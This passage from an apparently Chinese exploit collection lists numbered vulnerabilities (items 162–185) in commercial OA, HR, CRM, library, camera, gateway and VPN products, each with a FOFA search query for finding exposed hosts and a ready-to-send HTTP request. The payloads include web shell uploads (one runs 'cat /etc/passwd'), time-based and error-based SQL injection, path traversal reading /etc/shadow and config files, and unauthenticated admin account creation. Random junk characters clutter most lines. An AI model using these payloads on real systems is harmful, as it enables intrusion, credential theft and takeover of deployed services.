<fileName>../../../../dizxdell.aspx</fileName>: R3 O8 z/ n! V- o. h/ a
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>9 h& W j# X, M/ K
<tag>3</tag>8 j0 X2 ?6 X+ ?& q% g! r3 S0 ?
</UploadResume>% V' N* U8 A% N# v0 H
</soap:Body>
( ]& t$ l# o% ^3 m9 t& L0 g0 J* p: `</soap:Envelope>+ X/ v1 |/ }3 k
$ H' N6 F5 r1 Q$ i8 t
( ]3 ^2 B5 K! K6 F# q7 d, K+ [http://x.x.x.x/dizxdell.aspx: k: D0 I' m, L# t7 y2 {5 s9 H1 Q
8 Q; M- `9 y9 ^# {0 K
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
" j0 w$ X h* JFOFA: app="和丰山海-数字标牌"( q7 Q7 A5 B9 G% z' Y
POST /QH.aspx HTTP/1.1" \5 m& \! V* V1 k' C- |& x# A
Host: x.x.x.x( j* \& ~0 d! B& @9 {' i4 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
, S6 N8 r, ?! ^6 j, c, LConnection: close1 e( f4 E+ c/ Y y- M
Content-Length: 583
- W5 M& O* Z" cContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey/ K7 p) C# X9 m+ Z
Accept-Encoding: gzip
# k3 I! m% O7 I! Q
; b7 i) E! V U3 J8 c------WebKitFormBoundaryeegvclmyurlotuey$ Y; ~! w$ P, R7 R) ]2 Q
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"8 c) x5 A, K. G" A' I; A
Content-Type: application/octet-stream6 [4 n1 Q& c" Q
' R% }' D, V; _
<% response.write("ujidwqfuuqjalgkvrpqy") %>
4 {4 |( o( W. P7 i3 \------WebKitFormBoundaryeegvclmyurlotuey3 n' n, X0 A( t- b8 M
Content-Disposition: form-data; name="action"
7 O8 c; |2 F# j9 `( a+ L- P5 [& A
upload% J1 q# n+ D- i' \# Q8 N5 _# q9 R
------WebKitFormBoundaryeegvclmyurlotuey
6 h {0 d, }$ zContent-Disposition: form-data; name="responderId". g H* ?1 S5 k2 b' s# P
" d& |' G L/ P2 y% T% \
ResourceNewResponder
6 ], U" L" [, v; i3 E------WebKitFormBoundaryeegvclmyurlotuey( Y5 g( G- i2 U4 e
Content-Disposition: form-data; name="remotePath"
4 h6 O3 K: v, d8 [: |9 H9 O8 ]2 Q4 H" ]' t
/opt/resources
- J9 f/ \+ ^, t) X) L! R- X/ a------WebKitFormBoundaryeegvclmyurlotuey--8 T- z) X Q1 d4 I% q ]; i: c
. }6 g3 Q5 m$ b" T
" @1 E$ }* f* Yhttp://x.x.x.x/opt/resources/kjuhitjgk.aspx$ n4 Q, Q3 i) b; ?# X" c
3 [# L( s8 C0 ^0 ?9 `: X
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
) {! ^8 Z7 L) y$ F' }( VFOFA: icon_hash="-795291075"
6 A! Y" x" @& A8 F" h( BPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
# X# L! x0 g" q8 }9 `Host: x.x.x.x9 z: a$ w0 x4 G/ b. a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36( G# G ?: j; U; w. c) ]" S- ]
Connection: close
2 f ]) Q/ `0 ]$ w$ xContent-Length: 293
3 o5 K' k2 `; J7 |0 CAccept: */*& q$ ]( l# q8 |$ Y1 U
Accept-Encoding: gzip, deflate: R7 L4 m# L6 L/ M# K
Accept-Language: zh-CN,zh;q=0.9 H/ F% B( `' |) \3 U2 c
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
) A5 d0 Z9 ~8 a0 Y% d9 O, y0 E+ B) }) R
------iiqvnofupvhdyrcoqyuujyetjvqgocod
' Q9 j" z. f: K( u8 KContent-Disposition: form-data; name="name"
8 m4 Q4 `4 v0 @: p( T7 c: J- h- Q! ~ R+ m0 f
1.php" S8 u, Z) e$ C- q6 m
------iiqvnofupvhdyrcoqyuujyetjvqgocod5 k4 ?+ e4 Q9 H4 A* `, c
Content-Disposition: form-data; name="upfile"; filename="1.php"
* _! c' T9 Z3 pContent-Type: image/jpeg
& b B, W, I+ N: @1 C* F
5 T! ?2 y3 W9 J% J7 q% H2 X; l* Hrvjhvbhwwuooyiioxega8 W4 Q5 v* \7 x% P! I0 N
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
! T: u; F: k) Y7 l, L
' i1 ?9 E l/ c+ E! e! ~3 _/ ~% ^. }; }. ]' j6 @9 W& ^7 u& B
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传& |( D D; _ T/ O" d4 d# P
FOFA: title="智慧综合管理平台登入"( B3 M% Q3 z3 p2 C/ J( o4 @% o& ^
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1( D! O; I0 v; ?
Host: x.x.x.x. q3 t$ ]- O: v1 |0 L, ]: y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.00 a2 n2 t) @* I" u5 Y- l5 A
Content-Length: 288& J) }% ~1 F% e
Accept: application/json, text/javascript, */*; q=0.01
0 ]/ \+ j) {( a) d- KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,, g, p: ~3 v1 I! z! @8 w7 e
Connection: close
0 ~! ` q9 O7 u* `' X# }( n1 ?Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl; K( d: Y- N+ q/ t7 f
X-Requested-With: XMLHttpRequest
5 b, X i1 u7 N' S! UAccept-Encoding: gzip
' @7 h; k( j5 R
4 `8 k# u E; D9 I1 c2 {8 j------dqdaieopnozbkapjacdbdthlvtlyl- M w0 T% h' Q3 |8 [+ S8 r
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"+ v: h' |, A: I4 a" t5 B5 t1 O
Content-Type: image/jpeg
9 G; c+ ^. t: _3 A) a
; i4 N X8 v. e% @: N: W<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
l" s- I! ^" f' }- G------dqdaieopnozbkapjacdbdthlvtlyl--
& s+ ^9 |$ K1 Z& \/ i T" }3 s1 b& L) \/ H( t+ D' h% M
2 i: o9 a' p0 F6 T! y* P/ h4 w7 I
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
) b! P& [3 }7 H8 f- `8 Y; ~7 t4 K9 c/ J! ~
165. OrangeHRM 3.3.3 SQL 注入
- J: C' T7 C. N" N7 k) ZCVE-2024-36428
8 b; X5 \7 x( y$ sFOFA: app="OrangeHRM-产品"
& D4 a8 h4 q' |/ I$ B7 `- {6 OURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))% x. ?" \) V% w6 P. H6 Q! w: w1 d J( ^
' J) v% Z2 F% q5 R: P5 q
8 W3 d( T. h5 ]% m6 l166. 中成科信票务管理平台SeatMapHandler SQL注入& W- V0 g. ~+ m" V4 j* {8 D/ r
FOFA:body="技术支持:北京中成科信科技发展有限公司"
1 L2 J5 Q" E5 ^POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
- K' ]+ B& l( _6 J( IHost:
- `2 {, y* w# K8 E6 Z6 [Pragma: no-cache. }3 X+ h( N& N
Cache-Control: no-cache
# Q* u' j4 J9 m; _Upgrade-Insecure-Requests: 12 ?. @5 _' D6 V( p5 [7 A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36! q V' J& L. n+ g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 t) D! z/ ^6 L& fAccept-Encoding: gzip, deflate: S, H P" g: m1 d( E! n
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
& x' R# @3 w% m8 i/ \Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE2 J( s8 p+ k5 E: h# U! n- ?
Connection: close
# c( I; G" O# {- P. L! I9 LContent-Type: application/x-www-form-urlencoded
8 q" a2 w9 L7 V) p0 u8 tContent-Length: 89" E( @2 u) \+ y O" ^1 u
, o3 H( A J1 q7 s. U1 v* D* ?5 KMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE# V! M4 F" L7 t
! }, G* f5 x6 b) I& U
5 Q8 ~8 l6 x5 [167. 精益价值管理系统 DownLoad.aspx任意文件读取0 |8 |3 L }1 n$ p& ~/ G; {( z
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
t* h" u5 g4 D. M5 ^6 HGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
( p t& F8 p9 s6 Q, b" A' xHost:
4 W7 i. b1 S3 L# l0 N# Z, fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 ]$ x* R7 i: ]+ @# z5 E) ~# l
Content-Type: application/x-www-form-urlencoded
0 A4 x& h1 z! \3 i7 t1 {; ?, I0 [Accept-Encoding: gzip, deflate
$ p" A1 R, [9 \9 I) u+ _Accept: */*" g, q0 m5 i: _/ T/ ^! }
Connection: keep-alive7 ]9 V3 g8 b- x0 m6 U) F( i5 m
. F; M& r8 Y8 `% e" o, Y- o3 h4 l, j" N; b
168. 宏景EHR OutputCode 任意文件读取+ f, Z& f, i3 p$ m- t
FOFA:app="HJSOFT-HCM") i1 C4 r" ?* V. |3 H0 U' Y
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1% h, X. R' {2 e2 _2 |& z7 I
Host: your-ip
$ A+ X) S! B! u! E$ L" l+ g% ]) r/ JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
: B: s( ~ f8 O' w+ JContent-Type: application/x-www-form-urlencoded
* M+ ]6 h* {: ?+ l2 U, l+ {. R7 VConnection: close
& Z) {) Z' x3 u& Z" g' J. n9 b4 ^# B1 e
" V2 A/ z( S1 x, G! `% ]& I4 `# s/ u& c2 `
169. 宏景EHR downlawbase SQL注入
1 U; R' i+ ~% `9 L, [* B8 K/ }FOFA:app="HJSOFT-HCM"2 P# e( { ]; R3 W- R, s
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
+ u- o6 F2 Y s& ~; @) FHost: your-ip, ? z$ T; [6 ~* k2 v% r" }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 H; D& t+ y9 X! l* k* l! m1 o
Accept: */* _% W* i# q3 f0 j6 R
Accept-Encoding: gzip, deflate7 ~! w- k6 f% ^( Z$ E$ l& P
Connection: close
1 v6 T7 s) x; L4 P2 n/ V
2 W- O- V' I; g Z$ V; V& u- s9 f) a5 I
, z- w! k9 ^; e9 }- ~170. 宏景EHR DisplayExcelCustomReport 任意文件读取4 E! d$ o- O# _, m
FOFA:body="/general/sys/hjaxmanage.js") |7 C& y ]3 Q
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1% ~, l$ l1 J9 h* h. O
Host: balalanengliang, Y4 q0 v/ Y) B9 }0 b
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' t* @4 B, h3 G7 d2 i) lContent-Type: application/x-www-form-urlencoded
" L& y& g4 d7 q4 D2 \, `0 A) E+ R
8 N6 F, J$ ] w- z. Q% |' _, r0 afilename=../webapps/ROOT/WEB-INF/web.xml3 ]' D) { @& j6 ]% N/ O+ u0 [7 z
4 r* s) D9 r) `) D6 E4 c
/ ?2 S; b5 x- I- m. i171. 通天星CMSV6车载定位监控平台 SQL注入
: A t3 w5 }: Y+ K* m L# G" ZFOFA:body="/808gps/" L! J0 T9 J) d1 q; r
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
, ^# k+ h( e* T+ h( HHost: your-ip
3 f5 \8 a* P; d- B- R! OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0* Q4 e' j$ v8 Y% ^
Accept: */*
3 t, R' W' ^7 q, j/ @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 k. Z# `8 _# n/ E# yAccept-Encoding: gzip, deflate+ Y1 N" M- ^- |/ H: x
Connection: close- g) U$ G! q1 }. {6 r4 X
" f e* [, `9 ^+ O$ g! t9 i& M/ \2 L% |5 a# E0 L: B0 l
4 H5 W1 a/ P+ e I3 p, s- F
172. DT-高清车牌识别摄像机任意文件读取
8 g! y/ r3 r- I# k: w7 a7 mFOFA:app="DT-高清车牌识别摄像机"
' d/ O2 J% e1 k- |GET /../../../../etc/passwd HTTP/1.10 H' B+ m+ i1 A/ t
Host: your-ip
# h0 u) x7 e* ^) E/ B1 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# X5 n5 o1 E" z( X1 |9 w
Accept-Encoding: gzip, deflate
7 B6 A% z6 v4 h2 ]% YAccept: */*
$ m" c+ U! e* M8 oConnection: keep-alive
$ J4 L& Q0 c" c9 W, a
' o% f! X/ t" r' O" B, f' L7 k, n. s, i& }4 {
3 L3 R) N8 {' m6 ~5 w- z3 u
173. Check Point 安全网关任意文件读取, _8 V" I0 s4 O+ f
CVE-2024-24919! p L( f% a6 L4 l9 o) V5 b5 @! ^
FOFA:app="Check_Point-SSL-Network-Extender"
( U4 F8 A- ?% h! N- sPOST /clients/MyCRL HTTP/1.1
: l- e3 u) k8 A+ v$ ]/ K# HHost: your-ip0 ]5 Y1 Z; `8 ~
Content-Type: application/x-www-form-urlencoded! m# }) s6 o3 F2 O; i* S& N+ m. Z5 }
1 t; ?4 t" _ L' m$ N8 L- {
aCSHELL/../../../../../../../etc/shadow! T7 S5 W! M) v* }2 `
% Y; n- b, @6 q
s7 M7 j/ S" B: @
" ]$ d o! |$ | f+ \( o174. 金和OA C6 FileDownLoad.aspx 任意文件读取' s& ^. Z9 ?# w: j' N" _) V# h
FOFA:app="金和网络-金和OA"
1 D: Q) o9 D0 KGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
2 T" K0 B+ v8 b. e4 H# t- h! mHost: your-ip
) i8 z. L% V; A' ?. fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
. m7 ?: P6 G8 s- t" L: s; Q7 ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 w) P( W( h* @! t& z* ]' T2 GAccept-Encoding: gzip, deflate, br
+ ]8 y, k+ |2 C' G" p# o+ Y4 A/ [Accept-Language: zh-CN,zh;q=0.9& R( G- S* g# F5 R$ M! s8 R
Connection: close# X5 v1 |! r2 ~6 ]5 T1 g) `
+ T7 Q V+ T! G7 v/ K
. k: ]# l" ^0 p# t& N' W
' D7 u9 o/ F1 o5 y5 ?+ k; g3 ?. |4 v175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入! @$ f7 x5 z# ?% F _, u5 O$ G
FOFA:app="金和网络-金和OA"
" a$ h: i- F, A: y+ V0 bGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
" P8 L- h/ S/ {Host:. U2 v$ i% }) d8 t$ s" P
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.367 X; ?2 k, K' w+ d2 c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% F. k# U; b. x4 D8 W& s& K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 p/ s% O# \5 x6 m, C6 {
Accept-Encoding: gzip, deflate
4 [) Q" I+ X- w2 I! g( `Connection: close+ p2 `6 d. G5 w: `3 |) Q9 W
Upgrade-Insecure-Requests: 1
& e; H+ F$ i, |
& j) o5 f6 m9 H: A# u; l. R7 N/ Z9 V" I2 J6 W( U Q2 q
176. 电信网关配置管理系统 rewrite.php 文件上传
5 a, @6 Y, ?4 k9 n7 hFOFA:body="img/login_bg3.png" && body="系统登录"
3 f! Y- X m* F" a2 {' M vPOST /manager/teletext/material/rewrite.php HTTP/1.1
: v3 F% M4 s! [3 RHost: your-ip
/ X- Q! H# o# ]0 b! }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
, i& @( D0 ~0 Y3 M+ V2 _1 B6 ?Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT) p: O$ r9 T0 w
Connection: close
! D, @5 C& Y U! }( x0 u H9 l+ }
" H4 W; F1 j6 J f------WebKitFormBoundaryOKldnDPT- {4 v: k* Q/ L' ?
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
, s8 E0 Q% O' d5 UContent-Type: image/png6 T+ i9 ^+ C Y/ u3 h
+ F. F& W0 H/ B# d' Z
<?php system("cat /etc/passwd");unlink(__FILE__);?>
; n" G) t9 G5 Z------WebKitFormBoundaryOKldnDPT. E0 x4 G7 u5 Z" U
Content-Disposition: form-data; name="uploadtime"
' q( j1 t* j' Z * M; A# U8 z/ |2 [/ i5 J
! l- m! N+ J$ _* F& V
------WebKitFormBoundaryOKldnDPT--
) r/ i( q, v7 z$ l# o4 z7 F3 P2 ]9 I; T5 H# T! b5 l
; ?. b/ B; \+ @! }, i4 X7 k
j" j* J) B- J. P+ E, A6 ^4 i
177. H3C路由器敏感信息泄露
- M8 X. V* \; Y+ n& E8 Z( B/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg2 f1 T/ ^' r8 j, S( g3 m) a. ^
/userLogin.asp/../actionpolicy_status/../M60.cfg* b& ]6 `2 n% Q6 ?/ ^4 @5 ]
/userLogin.asp/../actionpolicy_status/../GR8300.cfg+ t2 G6 V5 O) ]0 Y. C* F+ g N
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
' A7 S* T: b* b( X/userLogin.asp/../actionpolicy_status/../GR3200.cfg8 c; P! o* m3 o) U' L$ V* ?5 b
/userLogin.asp/../actionpolicy_status/../GR2200.cfg* C# ^+ K5 K+ [' y2 a
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
( R1 I( @( S6 {& H- B/ ?/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
! U+ T- i& |. i2 V; o5 b! w* h/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg" u! J8 z: e+ d2 y* d* ^
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg8 i. p/ y; C" t
/userLogin.asp/../actionpolicy_status/../ER5200.cfg* S- ^# k5 Z% W1 r5 d
/userLogin.asp/../actionpolicy_status/../ER5100.cfg- R9 l# o5 @% Y" M& F
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg/ v3 I( {' P6 L2 Y! K
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
# u1 X2 b, r# E) r( l7 x/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
; u/ B1 n! q! O5 T6 {5 u& U/userLogin.asp/../actionpolicy_status/../ER3200.cfg
6 V1 z z8 f8 `0 v/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg+ G% _" ^% G, n5 u4 n9 M6 L
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
- s7 N+ }% L; x: c8 ^ f/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
# _" H4 ]# T% G$ e, R/userLogin.asp/../actionpolicy_status/../ER3100.cfg z8 [9 |% \# v0 @
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg3 N3 ]( B0 `0 P' }( z
8 c& x, j3 F0 B' z" j4 U9 p! x1 k( j: f& J, Y r) L3 R3 H
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
6 k$ [) x9 ^ A0 Q* DFOFA:header="/selfservice"
8 u7 V. Z; |) {- I) tPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
/ V! U! g- N6 g4 j) S! JHost:& k$ v# P7 z7 v+ j1 _( N3 K9 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
* A1 s1 Y6 ?+ o4 s/ f$ V! m4 D$ TContent-Length: 2528 Q8 J3 m: [ v0 h8 x
Accept-Encoding: gzip, deflate8 S k: a& d" F5 I
Connection: close3 l8 ^7 v) f1 z8 j+ Y
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
" E/ ?9 s. O0 |2 T-----------------aqutkea7vvanpqy3rh2l
' A$ _: E0 b; z7 \& [Content-Disposition: form-data; name="12234.txt"; filename="12234"
/ A' U8 S/ S/ o; C& RContent-Type: application/octet-stream
* N( E) F$ |! H- Q2 `) cContent-Length: 255& ?' i3 Z/ k; h1 `+ m5 V2 q" w& N
3 ]: k, Z6 I/ T2 A# ?, V. r
122346 ?6 \% n' C0 I2 @1 I; i( b2 P
-----------------aqutkea7vvanpqy3rh2l--
' N4 H/ v0 z \, Q3 X ^
; f% m7 w& }# a/ w! P
+ S" t1 U. @; H i4 W0 L2 YGET /imc/primepush/%2e%2e/flex/12234.txt
3 o6 z9 J, g, `* j; _' ]5 M, @- |8 H' }, x4 ?; r0 ~
" ^. k( h) J1 c& @4 W179. 建文工程管理系统存在任意文件读取$ {- |8 A0 b4 a/ ]! ?( F
POST /Common/DownLoad2.aspx HTTP/1.1. r4 k% I0 ?) U$ B# N5 @& p
Host: {{Hostname}}
, O5 U$ d' C; C9 N' ?( d1 lContent-Type: application/x-www-form-urlencoded
6 S% D4 L _ Z& Q. t1 r( K5 DUser-Agent: Mozilla/5.0
R' t$ B$ \) Y7 |- e# |& [& f" F
7 F: Z! A& K1 N, R/ d) M; Ppath=../log4net.config&Name=4 p% Y" v0 {4 t3 [, E5 {4 ?) [
$ ?% W9 g, N5 ?3 V
# z; \% v6 c. \6 d180. 帮管客 CRM jiliyu SQL注入
( V% h, W: [' H4 lFOFA:app="帮管客-CRM"1 c6 m: N0 X6 B. n
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
, [ e$ I* O" {Host: your-ip+ \+ g3 s, g& v: D4 k7 o. L D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
. I7 S( [3 K/ n. WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 u! n$ ~9 A6 W _/ \, YAccept-Encoding: gzip, deflate& `6 ~4 s( Y: y! q6 C8 s
Accept-Language: zh-CN,zh;q=0.9
( J$ q) b7 i3 @" z8 C+ } O& U! HConnection: close
( V& A$ e, B* _2 g$ h/ B9 ^% ~. e3 w! Z& V3 v$ h" d/ ]
- K# L/ j9 K2 ] B& F$ W# i( ^
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入1 T, f1 I/ B J+ N4 |
FOFA:"PDCA/js/_publicCom.js"
9 E' A. C; q0 K' W; EPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
H6 y! M( r' i/ n& ?Host: your-ip' v* b8 q8 B5 H( b: K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
8 w, `" P7 R3 K" K3 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# ~% W. m0 j [8 e+ C6 @( m) @9 h
Accept-Encoding: gzip, deflate, br
/ l& I* ~6 N- P% W8 HAccept-Language: zh-CN,zh;q=0.9
3 q, G, f$ {0 N- }" p( O! CConnection: close5 j. `9 Q9 U9 z
Content-Type: application/x-www-form-urlencoded1 h/ L6 f7 \! r
! V, d6 k7 k" u/ u) V6 g
7 J3 r9 A' P/ laction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
: c% l& w$ `2 `' m" M+ R3 s O5 g1 i: |6 R
: ]7 H3 [+ K5 l7 ]+ \* c! j3 a182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建- w3 s: Q9 x/ q
FOFA:"PDCA/js/_publicCom.js"
! y+ r1 i; D3 L4 f' P N R* NPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
, T7 Y* O5 O( \/ C& V; P2 h3 ]; NHost: your-ip/ b% b3 x1 n( F1 J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
' A9 k0 C- L' U S8 Y. c vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 y9 N! Q) E9 Y& r- n0 I: z% [+ C
Accept-Encoding: gzip, deflate, br8 \0 _& p$ j. Z( M) y. a
Accept-Language: zh-CN,zh;q=0.9) n+ V# k+ J; y
Connection: close5 @5 K" G' h8 g3 L+ t4 Z
Content-Type: application/x-www-form-urlencoded/ g+ S+ f" V. b) [+ u2 n5 O& Z
' z# `7 g& T' @4 R$ m2 o" a# ` U& C6 S) m$ N0 R9 c% f1 x# s' I
username=test1234&pwd=test1234&savedays=1
. k1 l5 ^. B; g* I! D5 L4 x9 H, x0 c( a+ \0 a; L+ X
6 d/ |! b9 u: Y, L183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入/ K9 Z! d( Z; W1 s: n0 N; [7 P
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
5 _0 Y& ?6 H1 |GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
' [% `$ L+ M# i7 _2 DHost: your-ip1 }4 g. S4 S- ~8 h% I* f
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
- k5 U+ v( S- X% G* u5 n7 XAccept-Charset: utf-83 p$ y; F6 z* ^& E
Accept-Encoding: gzip, deflate: g( O/ N; X( Q; d7 j2 g5 H" H6 `
Connection: close/ Z, L$ g: J- o8 P9 x5 f6 l
$ o: d i9 ~" S& i, R3 {7 K r( F! g$ ^- u( z' N
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
/ F; i$ n( q* G$ S$ L8 g* ~FOFA:server="SunFull-Webs"
, ~) W, D6 X7 u; l( t- jPOST /soap/AddUser HTTP/1.19 k, x, J5 u5 e v/ H
Host: your-ip
# r. I8 X: D# _- ]! rAccept-Encoding: gzip, deflate. R h( r5 o4 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0# t A$ n3 u6 w& X B. c5 |( L
Accept: application/xml, text/xml, */*; q=0.01
( O( M( D% c, W: \, G% fContent-Type: text/xml; charset=utf-8
3 b) [3 [- }, ~2 YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! l6 K D( [0 m: i8 V; {0 P
X-Requested-With: XMLHttpRequest
- b9 l6 C1 p0 c4 B4 ~" ^1 O
2 s) ^: r0 t6 y. {9 e3 n4 {. ?
1 y: x( ~/ |# N/ q: p& G* i3 Tinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
8 v4 a3 @& J' D2 x6 {# z5 v& N* R: V5 z
/ i6 g, C0 U& R185. 瑞友天翼应用虚拟化系统SQL注入7 O5 o" ~- r# L9 r
version < 7.0.5.1
